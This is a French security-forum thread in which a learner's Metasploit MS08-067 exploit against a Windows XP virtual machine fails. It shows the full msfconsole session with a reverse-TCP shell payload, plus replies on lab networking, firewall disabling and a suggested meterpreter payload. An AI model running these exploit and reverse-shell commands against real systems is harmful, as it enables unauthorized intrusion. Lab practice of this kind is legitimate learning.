Annonce

Réduire
Aucune annonce.

Kali linux machine cible (XP) injoignable via Metasploit (ConnectionRefused)

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Kali linux machine cible (XP) injoignable via Metasploit (ConnectionRefused)

    En m'entrainant avec Metasploit avec 2 machine virtuelle , une qui attaque "Kali Linux avec Metasploit , et la cible " un windows xp" sans antivirus n'y mise à jour .

    Je lance Metasploit , j'utilise un payload du moins j'essaye de bien comprendre ,en me servant de RHOST pour mettre L'adresse IP de Windows XP, tout va pour le mieux mais des que je lance l'exploit ....

    Le terminal me dit que l'exploit a échoué , la connexion a était refusé par l'hôte distant (10.0.2.15:445).

    Mes 2 machine virtuelle Kali et windows xp , son réglé sur connexion Nat dans configuration réseau .Et c'est là ou je galère justement, avec le réseau .

    l'adresse IP de mon xp est : 10.0.2.15

    en faites je ne sais pas comment configuré correctement le réseau sur virtualbox que ce soit pour Kali linux ou windows xp pour m'entrainer avec metasploit . Merci d'avance

    PS :


    Voilà le rapport entier de Metasploit :

    Code:
    msf > use exploit/windows/smb/
    use exploit/windows/smb/ms03_049_netapi
    use exploit/windows/smb/ms04_007_killbill
    use exploit/windows/smb/ms04_011_lsass
    use exploit/windows/smb/ms04_031_netdde
    use exploit/windows/smb/ms05_039_pnp
    use exploit/windows/smb/ms06_025_rasmans_reg
    use exploit/windows/smb/ms06_025_rras
    use exploit/windows/smb/ms06_040_netapi
    use exploit/windows/smb/ms06_066_nwapi
    use exploit/windows/smb/ms06_066_nwwks
    use exploit/windows/smb/ms06_070_wkssvc
    use exploit/windows/smb/ms07_029_msdns_zonename
    use exploit/windows/smb/ms08_067_netapi
    use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
    use exploit/windows/smb/ms10_061_spoolss
    use exploit/windows/smb/netidentity_xtierrpcpipe
    use exploit/windows/smb/psexec
    use exploit/windows/smb/psexec_psh
    use exploit/windows/smb/smb_relay
    use exploit/windows/smb/timbuktu_plughntcommand_bof
    msf > use exploit/windows/smb/067_netapi
    [-] Failed to load module: exploit/windows/smb/067_netapi
    msf > use exploit/windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST                     yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    
    msf exploit(ms08_067_netapi) > set RHOST 10.0.2.15
    RHOST => 10.0.2.15
    msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
    payload => windows/shell/reverse_tcp
    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    10.0.2.15        yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    
    Payload options (windows/shell/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
       LHOST                      yes       The listen address
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    
    msf exploit(ms08_067_netapi) > set LHOST 10.0.2.15
    LHOST => 10.0.2.15
    msf exploit(ms08_067_netapi) > show options
    
    Module options (exploit/windows/smb/ms08_067_netapi):
    
       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    10.0.2.15        yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
    
    
    Payload options (windows/shell/reverse_tcp):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
       LHOST     10.0.2.15        yes       The listen address
       LPORT     4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Automatic Targeting
    
    
    msf exploit(ms08_067_netapi) > exploit
    [*] Started reverse handler on 10.0.2.15:4444 
    [-] Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (10.0.2.15:445).
    msf exploit(ms08_067_netapi) >

  • #2
    Moi je l'ai installer sur VirtualBox et j'ai suivis le tutoriel de Kali-linux.fr dont voici l'image de reglages réseaux et pour moi tout fonctionne impeccable.
    Je te conseille de suivre les autres réglages et installer les pkages supplèmentaires pour ne pas avoir de surprise par la suite genre manque d'espace disque ou autre.

    http://www.kali-linux.fr/wp-content/...2013/03/17.png

    Commentaire


    • #3
      Bonjour,

      Personnellement j'ai créer un "Réseau Nat" dans Virtualbox (Fichiers > Paramètres > Réseau)
      Ce réseau contiendra la machine Kali et celle XP (ainsi que les autres machines cibles), c'est comme un réseau dans le réseau, dans le sens où tu auras accès à internet mais le réseau local contiendra uniquement ces 2 machines.

      Ensuite tu configure tes 2 machines (Config < Réseau < Mode d'accès réseau: "Réseau NAT", Nom: "Ce que t'as créer avant")

      Pour finir, dans les paramètres de ta BOX affecte à ces 2 appareils des adresses locales fixes (paramètres DHCP).
      Puis sur Kali:
      Code:
      ifconfig eth0 up
      Code:
      dhclient
      Code:
      ifconfig  -a
      Là tu notes l'adresse locale de ta machine Kali

      Passons à XP:
      Ouvre un cmd: "Exécuter" --> "cmd.exe"
      Code:
      ipconfig /all
      Notes l'adresse IP (tu auras plusieurs interfaces, choisis la bonne).

      Voilà tu auras tes 2 adresses ip (attaque/cible) et ton réseau configuré à ma façon.

      PS: Si par la suite tu n'arrive toujours pas à communiquer avec ta machine XP: désactive le pare-feu windows de celui-ci.
      Puis essayes de le joindre via Kali avec
      Code:
      ping <ipMachineXP>
      Si tu reçois une réponse c'est bon, sinon il y a toujours un problème.

      Cordialement.


      Suivre Hackademics: Twitter, Google+, Facebook.

      Commentaire


      • #4
        Dreamus, merci j'ai réglé ça sur réseau par pont actuellement, du moins pour Kali Linux, mais je n'ai pas encore fait le test .Je réinstalle Xp, en me servant du bouquin de Metasploit pour installer SNMP .En effet quad j'ai voulu installer ça, j'ai eu un message d'erreur me disant qu'il fallait que j'installe le cd de XP .Hors sur une machine virtuelle installée, c'était la galère vue que quand j'avais installé le CD dans le lecteur, Xp à pas reconnu le cd pour pouvoir installer SNMP, juste la machine hôte . Je vais donc réinstaller Xp et les paramètres nécessaire pour m'entrainer avec Metasploit .Je réinstalle tout ça proprement, et je tente ta manip, en faisant à nouveau un test .Puis je tente ensuite la manip de _47 .

        _47

        Merci pour ton aide, j'étais réglé sur Nat mais ça n'a rien changé, impossible d'utiliser un exploit .

        je vais tenter ta manip;

        Pour ifconfig eth0 up, dhclient je choppe ça dans le shell j'imagine ?


        Je me permets un copié coller sur le bloc note histoire d'avoir tout à dispo, je te remercie en tout cas .

        Commentaire


        • #5
          tu ne peut pas renseigner LHOST(ip de la machine qui attaque) et RHOST(ip de la machine cible) avec la même ip, c'est normal que ça ne fonctionne pas

          ensuite vérifie que t'es deux machines communiquent bien entre elles , fait un ping des deux cotés pour voir si ça communique

          si c'est pas le cas, désactive le pare feux sur la machine windows xp et relance la commande "exploit" sur metasploit, ça devrait fonctionner

          ps:je te conseil d'utiliser le payload windows/meterpreter/reverse_tcp c'est a toi de voir
          Dernière modification par pl3x, 18 mai 2014, 15h06.

          Commentaire


          • #6
            tu ne peut pas renseigner LHOST(ip de la machine qui attaque) et RHOST(ip de la machine cible) avec la même ip, c'est normal que ça ne fonctionne pas
            Autant pour moi, je suis allé un peu vite j'ai pas regardé ton "rapport".

            Effectivement en reverse_tcp, c'est la machine cible qui viens se connecter à toi, il est donc logique que tu précise l'ip de Kali dans les options du Payload


            Suivre Hackademics: Twitter, Google+, Facebook.

            Commentaire


            • #7
              Pl3x

              ip_47

              je vais essayer tout ça , j'ai tout noté bien entendu, je vous remercie .Mais je crois que je vais devoir d'abord sérieusement me mettre à des cours sur le réseaux Je ne comprend plus rien, je ne peux plus aller sur internet sur xp que ce soit en Nat ou par pont .

              J'ai regardé ça toutes l'après midi , mais rien .Sur kali linux en Nat je peux me connecté sur internet, mais sur xp impossible c'est à ne plus rien comprendre .

              Voilà mes périphérique réseaux sur virtualbox en Nat .Je crois que je vais devoir apprendre ça avant de me mettre a metasploit ou kali , pour éviter de faire n'importe quoi au risque de faire sauter le réseau de mon système hôte .

              Le réseau,c'est vraiment une prise de tête .

              http://nsa33.casimages.com/img/2014/...3234623890.png
              Fichiers attachés

              Commentaire


              • #8
                Sur kali linux en Nat je peux me connecté sur internet, mais sur xp impossible c'est à ne plus rien comprendre
                sur la machine windows xp est ce que tu peux nous afficher le résultat de la commande ipconfig

                Commentaire


                • #9
                  Je fait ça de suite, et je t'envoie le rapport !

                  Commentaire


                  • #10
                    Voilà le rapport , j'ai rien, pas d'adresse ip rien de chez rien .

                    Capture1.jpg

                    http://www.casimages.com/img.php?i=1...1103499425.png


                    Si il faut configurer manuellement un adresse Ip je suis prêt à mettre la main dans le cambouis,comme je ne sais pas le faire .Pareil pour le ping , entre 2 machines d'ailleurs . J'ai jamais mis les main dans le réseau .


                    Merci

                    Commentaire


                    • #11
                      voila pourquoi ça ne fonctionne pas sur ta machine windows xp , ta carte réseau n'est pas activé

                      va sur panneau de configuration >> connexions réseau >> fait un clique droit sur la carte réseau (est ce que tu vois un icone ?) et fait activer
                      Dernière modification par pl3x, 18 mai 2014, 22h27.

                      Commentaire


                      • #12
                        voilà ce que j'ai en allant dans option internet de windows xp .

                        Même en réseau par pont dans virtualbox j ne peux pas aller sur internet.Mais sur kali par contre , je peux .


                        Capture4.jpg

                        http://www.casimages.com/img.php?i=1...2640635950.png

                        Commentaire


                        • #13
                          je voulais dire "connexions réseau" dans le panneau de configuration , sorry

                          Commentaire


                          • #14
                            Quand je vais dans connexion réseau j'ai rien , une page blanche .

                            Pourtant hier j'ai pu aller sur internet , je ne comprend vraiment pas .Probablement qu'il faut configurer un réseau manuellement , mais là je ne sais vraiment pas comment faire ça . Encore merci

                            Commentaire


                            • #15
                              Probablement qu'il faut configurer un réseau manuellement
                              tu ne peux pas configurer un réseau si il n'y a pas de carte réseau détecté

                              va dans le gestionnaire de périphérique et vérifie que le pilote de ta carte réseau est bien installé , ou sinon refait une installation de ton image windows xp sur virtualbox (pour démarrer sur de bonne base)

                              ps: pour le moment ton "problème" n'a rien a voir avec metasploit... donc fait signe quand tu as de la connexion sur ta machine xp, ensuite on verra
                              Dernière modification par pl3x, 18 mai 2014, 22h50.

                              Commentaire

                              Chargement...
                              X